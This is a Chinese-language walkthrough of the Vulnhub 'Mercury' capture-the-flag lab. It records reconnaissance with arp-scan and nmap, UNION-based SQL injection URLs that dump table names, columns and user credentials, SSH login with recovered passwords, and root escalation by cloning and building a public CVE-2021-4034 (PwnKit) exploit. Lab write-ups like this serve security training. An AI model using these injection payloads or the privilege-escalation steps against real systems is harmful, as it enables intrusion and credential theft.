Vulnhub-Mercury
Mercury靶机下载:https://www.vulnhub.com/entry/the-planets-mercury,544/
攻击机:KALI
打开虚拟机发现无法获取地址(不知道是不是普遍现象??)
重启后在开机时长按shift
选择Advanced options for Ubuntu
进入后按e
将ro quiet更改为rw signie init=/bin/bash后按ctrl+x进入系统,输入: lsb_release -a 系统发行版本
使用vi /etc/netplan/00-installer-config.yaml看到网卡名有问题并修改
重启后正常
信息搜集
在KALI中使用ARP-SCAN确认靶机IP
arp-scan -l
使用NMAP扫描端口
nmap -A -p 1-65535 192.168.122.136
发现只有22和8080端口
尝试构造错误,查看是否有debug
发现三个页面,尝试打开前两个,都没什么有价值的内容 访问http://192.168.122.136:8080/mercuryfacts/显示如下页面
漏洞攻击
点击Load a fact发现疑似SQL注入点
尝试查询数据库名
利用数据库名查表名
http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='mercury'/
利用表名查询字段
http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'/
利用字段名查具体数据,得到几组用户名密码
http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(username,0x2d,password)%20from%20users/
尝试SSH登录,最后使用webmaster-mercuryisthesizeof0.056Earths连上了
ll发现目录下的flag
查看其他文件,在mercury_proj/notes.txt下发现一个用户名和base64加密的密码
解密后得到mercurymeandiameteris4880km
切换成功
提权
查找有权限的命令find / -perm -u=s -type f 2>/dev/null经搜索发现最下面一个存在CVE-2021-4034提权漏洞
使用git clone https://github.com/berdav/CVE-2021-4034执行make命令后生产cve-2021-4034*
直接执行后提权成功 使用find命令查找flag后打开
find / -name "*flag*"